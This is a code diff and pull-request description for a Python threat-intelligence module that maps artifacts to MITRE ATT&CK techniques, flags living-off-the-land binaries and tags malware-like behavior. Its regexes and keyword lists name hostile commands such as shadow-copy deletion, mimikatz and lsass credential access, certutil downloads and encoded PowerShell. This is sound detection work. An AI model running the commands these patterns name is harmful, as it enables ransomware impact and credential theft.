+        unique: Dict[str, Dict[str, Any]] = {}
+        for item in items:
+            normalized = dict(item)
+            key = repr(
+                sorted(
+                    (str(k), repr(v))
+                    for k, v in normalized.items()
+                )
+            )
+            unique[key] = normalized
+        return [unique[key] for key in sorted(unique)]
+
+    @staticmethod
+    def _finding_confidence(
+        evidence: Sequence[Mapping[str, Any]],
+        source_rules: Sequence[str],
+    ) -> float:
+        source_kinds = {
+            str(item.get("kind"))
+            for item in evidence
+        }
+        value = 0.45 + min(0.25, len(evidence) * 0.07)
+        value += min(0.15, len(source_kinds) * 0.05)
+        value += min(0.10, len(source_rules) * 0.03)
+        return round(min(0.98, value), 2)
+
+    @staticmethod
+    def _assessment_confidence(
+        techniques, lolbins, malware_tags
+    ) -> float:
+        if not (techniques or lolbins or malware_tags):
+            return 0.0
+        corroboration = (
+            len(techniques) + len(lolbins) + len(malware_tags)
+        )
+        diversity = sum(
+            bool(group)
+            for group in (techniques, lolbins, malware_tags)
+        )
+        strongest = max(
+            [item.confidence for item in techniques]
+            + [item.confidence for item in lolbins]
+            + [item.confidence for item in malware_tags],
+            default=0.0,
+        )
+        return round(
+            min(
+                0.98,
+                0.25
+                + strongest * 0.45
+                + corroboration * 0.025
+                + diversity * 0.06,
+            ),
+            2,
+        )
+
+    @staticmethod
+    def _relationships(
+        techniques, lolbins, malware_tags
+    ) -> List[Dict[str, Any]]:
+        relationships: List[Dict[str, Any]] = []
+        for technique in techniques:
+            node_ids = {
+                item.get("node_id")
+                for item in technique.evidence
+                if item.get("node_id") is not None
+            }
+            for item in technique.evidence:
+                node_ids.update(item.get("node_ids") or [])
+            for node_id in sorted(node_ids, key=str):
+                relationships.append(
+                    {
+                        "source": {
+                            "type": "node",
+                            "id": node_id,
+                        },
+                        "target": {
+                            "type": "attack-technique",
+                            "id": technique.technique_id,
+                        },
+                        "relationship": "supports",
+                        "score": round(
+                            technique.confidence, 2
+                        ),
+                    }
+                )
+
+        for item in lolbins:
+            for node_id in item.node_ids:
+                relationships.append(
+                    {
+                        "source": {
+                            "type": "node",
+                            "id": node_id,
+                        },
+                        "target": {
+                            "type": "lolbin",
+                            "id": item.executable,
+                        },
+                        "relationship": "contains",
+                        "score": round(item.confidence, 2),
+                    }
+                )
+
+        for item in malware_tags:
+            for node_id in item.node_ids:
+                relationships.append(
+                    {
+                        "source": {
+                            "type": "node",
+                            "id": node_id,
+                        },
+                        "target": {
+                            "type": "malware-tag",
+                            "id": item.tag,
+                        },
+                        "relationship": "supports",
+                        "score": round(item.confidence, 2),
+                    }
+                )
+
+        return sorted(
+            relationships,
+            key=lambda item: (
+                str(item["source"]["id"]),
+                str(item["target"]["type"]),
+                str(item["target"]["id"]),
+            ),
+        )
+
+    @staticmethod
+    def _summary(
+        techniques, lolbins, malware_tags
+    ) -> str:
+        if not (techniques or lolbins or malware_tags):
+            return (
+                "No deterministic threat-intelligence "
+                "mappings were produced."
+            )
+        parts = []
+        if techniques:
+            parts.append(
+                f"{len(techniques)} ATT&CK technique(s)"
+            )
+        if lolbins:
+            parts.append(f"{len(lolbins)} LOLBin(s)")
+        if malware_tags:
+            parts.append(
+                f"{len(malware_tags)} behavioral malware tag(s)"
+            )
+        return "Identified " + ", ".join(parts) + "."

--- a/titan_decoder/threat_intel/engine.py
+++ b/titan_decoder/threat_intel/engine.py
@@ -27,7 +27,20 @@ class ThreatIntelligenceEngine:
         ("T1082", re.compile(r"(?i)\b(?:systeminfo|hostname|wmic\s+os)\b"), "system-discovery"),
         ("T1083", re.compile(r"(?i)\b(?:dir\s+\/s|Get-ChildItem|findstr)\b"), "file-discovery"),
         ("T1562.001", re.compile(r"(?i)\b(?:set-mppreference|disableantispyware|stop-service\s+windefend|sc\s+stop)\b"), "impair-defenses"),
-        ("T1486", re.compile(r"(?i)\b(?:vssadmin\s+delete\s+shadows|wbadmin\s+delete\s+catalog|cipher\s+\/w:)\b"), "impact"),
+        ("T1490", re.compile(r"(?i)\b(?:vssadmin\s+delete\s+shadows|wbadmin\s+delete\s+catalog|wmic\s+shadowcopy\s+delete|bcdedit\b.{0,40}recoveryenabled\s+no)\b"), "inhibit-recovery"),
+        ("T1016", re.compile(r"(?i)\b(?:ipconfig|ifconfig|route\s+print|nltest\s+/domain)"), "network-config-discovery"),
+        ("T1033", re.compile(r"(?i)\bwhoami\b"), "user-discovery"),
+        ("T1036", re.compile(r"(?i)\.(?:pdf|docx?|xlsx?|pptx?|jpe?g|png|gif|txt)\.(?:exe|scr|com|pif|bat|cmd|js|vbs|hta)\b"), "double-extension"),
+        ("T1053.003", re.compile(r"(?i)(?:\bcrontab\b|/etc/cron)"), "cron-schedule"),
+        ("T1057", re.compile(r"(?i)(?:\btasklist\b|\bget-process\b|\bps\s+aux\b)"), "process-discovery"),
+        ("T1059.004", re.compile(r"(?i)(?:/bin/(?:ba)?sh\b|\b(?:ba)?sh\s+-c\s)"), "unix-shell"),
+        ("T1059.006", re.compile(r"(?i)\bpython(?:3(?:\.\d+)?)?(?:\.exe)?\s+-c\s"), "python-inline-exec"),
+        ("T1070.004", re.compile(r"(?i)(?:\bdel\s+/[fqs]\b|\brm\s+-(?:rf|fr)\b|\bsdelete\b|\bremove-item\b.{0,60}-recurse|\bcipher\s+/w:)"), "file-deletion"),
+        ("T1087", re.compile(r"(?i)(?:\bnet\s+(?:user|localgroup)\b|\bget-localuser\b)"), "account-discovery"),
+        ("T1112", re.compile(r"(?i)\breg(?:\.exe)?\s+(?:add|delete)\b"), "registry-modification"),
+        ("T1489", re.compile(r"(?i)(?:\bnet\s+stop\b|\btaskkill\s+/f\b|\bstop-service\b)"), "service-stop"),
+        ("T1543.003", re.compile(r"(?i)(?:\bsc(?:\.exe)?\s+create\b|\bnew-service\b)"), "service-install"),
+        ("T1552.001", re.compile(r"(?i)(?:\bfindstr\s+/si\s+password\b|\bgrep\s+-ri?\s+password\b)"), "credentials-in-files"),
     )
 
     def analyze(

--- a/titan_decoder/threat_intel/lolbins.py
+++ b/titan_decoder/threat_intel/lolbins.py
@@ -69,6 +69,19 @@ DEFAULT_LOLBIN_RULES = (
     LOLBinRule("Schtasks", "schtasks.exe", _exe("schtasks"), ("T1053.005",), ("/create", "/run", "/sc")),
     LOLBinRule("Certutil", "certutil.exe", _exe("certutil"), ("T1105", "T1140"), ("-urlcache", "-decode", "-decodehex")),
     LOLBinRule("Bitsadmin", "bitsadmin.exe", _exe("bitsadmin"), ("T1105",), ("/transfer", "/addfile", "/resume")),
+    LOLBinRule("MSBuild", "msbuild.exe", _exe("msbuild"), ("T1127.001",), (".csproj", ".proj", ".xml", "/p:")),
+    LOLBinRule("CMSTP", "cmstp.exe", _exe("cmstp"), ("T1218.003",), ("/s", "/ns", ".inf")),
+    LOLBinRule("Odbcconf", "odbcconf.exe", _exe("odbcconf"), ("T1218.008",), ("regsvr", "/a", ".dll")),
+    LOLBinRule("Regsvcs", "regsvcs.exe", _exe("regsvcs"), ("T1218.009",), (".dll",)),
+    LOLBinRule("Regasm", "regasm.exe", _exe("regasm"), ("T1218.009",), ("/u", ".dll")),
+    LOLBinRule("Forfiles", "forfiles.exe", _exe("forfiles"), ("T1202",), ("/c", "cmd")),
+    LOLBinRule("Pcalua", "pcalua.exe", _exe("pcalua"), ("T1202",), ("-a",)),
+    # "hh" and "at" are everyday words, so unlike the rules above these two
+    # require the literal ".exe" suffix to avoid firing on ordinary prose
+    # ("hh:mm", "look at the file").
+    LOLBinRule("HTML Help", "hh.exe", re.compile(r"(?i)(?<![A-Za-z0-9_])hh\.exe(?![A-Za-z0-9_])"), ("T1218.001",), ("http://", "https://", ".chm")),
+    LOLBinRule("At", "at.exe", re.compile(r"(?i)(?<![A-Za-z0-9_])at\.exe(?![A-Za-z0-9_])"), ("T1053.002",), ()),
+    LOLBinRule("Crontab", "crontab", _exe("crontab"), ("T1053.003",), ("curl", "wget", "| crontab")),
 )
 
 

--- a/titan_decoder/threat_intel/lolbins.py
+++ b/titan_decoder/threat_intel/lolbins.py
@@ -1,0 +1,84 @@
+"""Deterministic LOLBin identification."""
+
+from __future__ import annotations
+
+import re
+from dataclasses import dataclass
+from typing import Any, Iterable, List, Mapping, Pattern, Sequence
+
+from .models import LOLBinFinding
+
+
+@dataclass(frozen=True)
+class LOLBinRule:
+    name: str
+    executable: str
+    pattern: Pattern[str]
+    technique_ids: Sequence[str]
+    suspicious_terms: Sequence[str] = ()
+
+    def evaluate(self, nodes: Iterable[Mapping[str, Any]]) -> LOLBinFinding | None:
+        node_ids: List[Any] = []
+        matched_terms: List[str] = []
+        confidence = 0.0
+
+        for node in nodes:
+            text = " ".join(
+                str(node.get(key) or "")
+                for key in ("content_preview", "preview", "artifact_name", "method")
+            )
+            if not self.pattern.search(text):
+                continue
+            node_ids.append(node.get("id"))
+            confidence = max(confidence, 0.55)
+            lowered = text.lower()
+            for term in self.suspicious_terms:
+                if term.lower() in lowered:
+                    matched_terms.append(term)
+                    confidence = min(0.95, confidence + 0.08)
+
+        if not node_ids:
+            return None
+        return LOLBinFinding(
+            name=self.name,
+            executable=self.executable,
+            technique_ids=list(self.technique_ids),
+            confidence=confidence,
+            node_ids=node_ids,
+            matched_terms=matched_terms,
+        )
+
+
+def _exe(name: str) -> Pattern[str]:
+    return re.compile(
+        rf"(?i)(?<![A-Za-z0-9_]){re.escape(name)}(?:\.exe)?(?![A-Za-z0-9_])"
+    )
+
+
+DEFAULT_LOLBIN_RULES = (
+    LOLBinRule("PowerShell", "powershell.exe", _exe("powershell"), ("T1059.001",), ("-enc", "encodedcommand", "downloadstring", "invoke-expression", "iex")),
+    LOLBinRule("Command Shell", "cmd.exe", _exe("cmd"), ("T1059.003",), ("/c", "/k")),
+    LOLBinRule("Mshta", "mshta.exe", _exe("mshta"), ("T1218.005",), ("javascript:", "vbscript:", "http://", "https://")),
+    LOLBinRule("Rundll32", "rundll32.exe", _exe("rundll32"), ("T1218.011",), ("javascript:", "url.dll", "shell32.dll")),
+    LOLBinRule("Regsvr32", "regsvr32.exe", _exe("regsvr32"), ("T1218.010",), ("/s", "/u", "/i:", "scrobj.dll")),
+    LOLBinRule("Msiexec", "msiexec.exe", _exe("msiexec"), ("T1218.007",), ("/i", "/q", "http://", "https://")),
+    LOLBinRule("InstallUtil", "installutil.exe", _exe("installutil"), ("T1218.004",), ("/logfile=", "/logtoconsole=false")),
+    LOLBinRule("WMIC", "wmic.exe", _exe("wmic"), ("T1047",), ("process call create", "/node:")),
+    LOLBinRule("WScript", "wscript.exe", _exe("wscript"), ("T1059.005",), (".vbs", ".vbe")),
+    LOLBinRule("CScript", "cscript.exe", _exe("cscript"), ("T1059.005",), (".vbs", ".js", "//e:")),
+    LOLBinRule("Schtasks", "schtasks.exe", _exe("schtasks"), ("T1053.005",), ("/create", "/run", "/sc")),
+    LOLBinRule("Certutil", "certutil.exe", _exe("certutil"), ("T1105", "T1140"), ("-urlcache", "-decode", "-decodehex")),
+    LOLBinRule("Bitsadmin", "bitsadmin.exe", _exe("bitsadmin"), ("T1105",), ("/transfer", "/addfile", "/resume")),
+)
+
+
+def identify_lolbins(
+    nodes: Iterable[Mapping[str, Any]],
+    rules: Sequence[LOLBinRule] = DEFAULT_LOLBIN_RULES,
+) -> List[LOLBinFinding]:
+    findings = [
+        finding
+        for rule in rules
+        if (finding := rule.evaluate(nodes)) is not None
+    ]
+    return sorted(findings, key=lambda item: (-item.confidence, item.executable))

--- a/titan_decoder/threat_intel/malware.py
+++ b/titan_decoder/threat_intel/malware.py
@@ -1,0 +1,160 @@
+"""Behavioral malware tagging without unsupported family attribution."""
+
+from __future__ import annotations
+
+from typing import Any, List, Mapping, Sequence
+
+from .models import LOLBinFinding, MalwareTag
+
+
+def _node_text(node: Mapping[str, Any]) -> str:
+    return " ".join(
+        str(node.get(key) or "")
+        for key in ("content_preview", "preview", "artifact_name", "method")
+    ).lower()
+
+
+def identify_malware_tags(
+    nodes: Sequence[Mapping[str, Any]],
+    lolbins: Sequence[LOLBinFinding],
+    iocs: Mapping[str, Sequence[Any]],
+) -> List[MalwareTag]:
+    texts = [(node.get("id"), _node_text(node)) for node in nodes]
+    tags: List[MalwareTag] = []
+
+    downloader_nodes = [
+        node_id
+        for node_id, text in texts
+        if any(
+            term in text
+            for term in (
+                "downloadstring",
+                "invoke-webrequest",
+                "urlretrieve",
+                "bitsadmin",
+                "certutil -urlcache",
+            )
+        )
+    ]
+    if downloader_nodes or iocs.get("urls"):
+        tags.append(
+            MalwareTag(
+                tag="downloader-like",
+                category="delivery",
+                confidence=0.78 if downloader_nodes else 0.55,
+                reasons=["network retrieval behavior"]
+                + (["URL indicators present"] if iocs.get("urls") else []),
+                node_ids=downloader_nodes,
+            )
+        )
+
+    stager_nodes = [
+        node_id
+        for node_id, text in texts
+        if any(
+            term in text
+            for term in (
+                "invoke-expression",
+                "iex(",
+                "frombase64string",
+                "-encodedcommand",
+                "reflection.assembly",
+            )
+        )
+    ]
+    if stager_nodes:
+        tags.append(
+            MalwareTag(
+                tag="script-stager-like",
+                category="execution",
+                confidence=0.82,
+                reasons=["in-memory or encoded script execution behavior"],
+                node_ids=stager_nodes,
+            )
+        )
+
+    credential_nodes = [
+        node_id
+        for node_id, text in texts
+        if any(
+            term in text
+            for term in ("sekurlsa", "lsass", "mimikatz", "sam hive", "ntds.dit")
+        )
+    ]
+    if credential_nodes:
+        tags.append(
+            MalwareTag(
+                tag="credential-theft-like",
+                category="credential-access",
+                confidence=0.88,
+                reasons=["credential access terminology"],
+                node_ids=credential_nodes,
+            )
+        )
+
+    ransomware_nodes = [
+        node_id
+        for node_id, text in texts
+        if any(
+            term in text
+            for term in (
+                "vssadmin delete shadows",
+                "wbadmin delete catalog",
+                "cipher /w:",
+                "bcdedit /set",
+            )
+        )
+    ]
+    if ransomware_nodes:
+        tags.append(
+            MalwareTag(
+                tag="ransomware-impact-like",
+                category="impact",
+                confidence=0.82,
+                reasons=["recovery inhibition or destructive impact command"],
+                node_ids=ransomware_nodes,
+            )
+        )
+
+    discovery_nodes = [
+        node_id
+        for node_id, text in texts
+        if any(
+            term in text
+            for term in (
+                "systeminfo",
+                "whoami",
+                "ipconfig",
+                "tasklist",
+                "net user",
+                "dir /s",
+            )
+        )
+    ]
+    if discovery_nodes:
+        tags.append(
+            MalwareTag(
+                tag="host-discovery-like",
+                category="discovery",
+                confidence=0.68,
+                reasons=["host or environment discovery commands"],
+                node_ids=discovery_nodes,
+            )
+        )
+
+    if len(lolbins) >= 2:
+        tags.append(
+            MalwareTag(
+                tag="living-off-the-land-chain",
+                category="defense-evasion",
+                confidence=min(0.95, 0.58 + len(lolbins) * 0.08),
+                reasons=[f"{len(lolbins)} LOLBins identified"],
+                node_ids=[
+                    node_id
+                    for item in lolbins
+                    for node_id in item.node_ids
+                ],
+            )
+        )
+
+    return sorted(tags, key=lambda item: (-item.confidence, item.tag))

--- a/titan_decoder/threat_intel/models.py
+++ b/titan_decoder/threat_intel/models.py
@@ -1,0 +1,94 @@
+"""Typed, serialization-friendly threat-intelligence models."""
+
+from __future__ import annotations
+
+from dataclasses import dataclass, field
+from typing import Any, Dict, List
+
+
+def _clamp_confidence(value: float) -> float:
+    return round(max(0.0, min(1.0, float(value))), 2)
+
+
+@dataclass(frozen=True)
+class AttackTechniqueFinding:
+    technique_id: str
+    name: str
+    tactics: List[str]
+    confidence: float
+    evidence: List[Dict[str, Any]] = field(default_factory=list)
+    source_rules: List[str] = field(default_factory=list)
+
+    def to_dict(self) -> Dict[str, Any]:
+        return {
+            "technique_id": self.technique_id,
+            "name": self.name,
+            "tactics": sorted(set(self.tactics)),
+            "confidence": _clamp_confidence(self.confidence),
+            "evidence": list(self.evidence),
+            "source_rules": sorted(set(self.source_rules)),
+        }
+
+
+@dataclass(frozen=True)
+class LOLBinFinding:
+    name: str
+    executable: str
+    technique_ids: List[str]
+    confidence: float
+    node_ids: List[Any] = field(default_factory=list)
+    matched_terms: List[str] = field(default_factory=list)
+
+    def to_dict(self) -> Dict[str, Any]:
+        return {
+            "name": self.name,
+            "executable": self.executable,
+            "technique_ids": sorted(set(self.technique_ids)),
+            "confidence": _clamp_confidence(self.confidence),
+            "node_ids": list(dict.fromkeys(self.node_ids)),
+            "matched_terms": sorted(set(self.matched_terms)),
+        }
+
+
+@dataclass(frozen=True)
+class MalwareTag:
+    tag: str
+    category: str
+    confidence: float
+    reasons: List[str] = field(default_factory=list)
+    node_ids: List[Any] = field(default_factory=list)
+
+    def to_dict(self) -> Dict[str, Any]:
+        return {
+            "tag": self.tag,
+            "category": self.category,
+            "confidence": _clamp_confidence(self.confidence),
+            "reasons": list(dict.fromkeys(self.reasons)),
+            "node_ids": list(dict.fromkeys(self.node_ids)),
+        }
+
+
+@dataclass(frozen=True)
+class ThreatAssessment:
+    version: str
+    catalog_version: str
+    techniques: List[AttackTechniqueFinding]
+    tactics: List[str]
+    lolbins: List[LOLBinFinding]
+    malware_tags: List[MalwareTag]
+    relationships: List[Dict[str, Any]]
+    confidence: float
+    summary: str
+
+    def to_dict(self) -> Dict[str, Any]:
+        return {
+            "version": self.version,
+            "catalog_version": self.catalog_version,
+            "techniques": [item.to_dict() for item in self.techniques],
+            "tactics": sorted(set(self.tactics)),
+            "lolbins": [item.to_dict() for item in self.lolbins],
+            "malware_tags": [item.to_dict() for item in self.malware_tags],
+            "relationships": list(self.relationships),
+            "confidence": _clamp_confidence(self.confidence),
+            "summary": self.summary,
+        }


### PR DESCRIPTION
## Summary

Implements Milestone 4: deterministic threat intelligence.

### Included

- Evidence-backed MITRE ATT&CK technique mappings
- ATT&CK tactics
- ATT&CK catalog expanded to 48 techniques
- ATT&CK IDs wired into built-in detection rules
- Structured LOLBin identification
- Behavioral malware classification
- Independent confidence scoring
- Threat relationships tied to supporting nodes
- JSON report integration
- Markdown and HTML case-report integration
- JSON, DOT, and Mermaid graph integration
- Canonical merged IOC input
- Documentation and regression tests

Named malware-family attribution is intentionally excluded from Threat Intelligence v1.0 and can be implemented as a separate additive framework.

## Validation

```bash
python -m ruff check .
# All checks passed

python -m pytest \
  tests/test_threat_intelligence.py \
  tests/test_threat_cli_wiring.py \
  tests/test_threat_graphs.py \
  tests/test_threat_case_reports.py
# 9 passed

python -m pytest
# 420 passed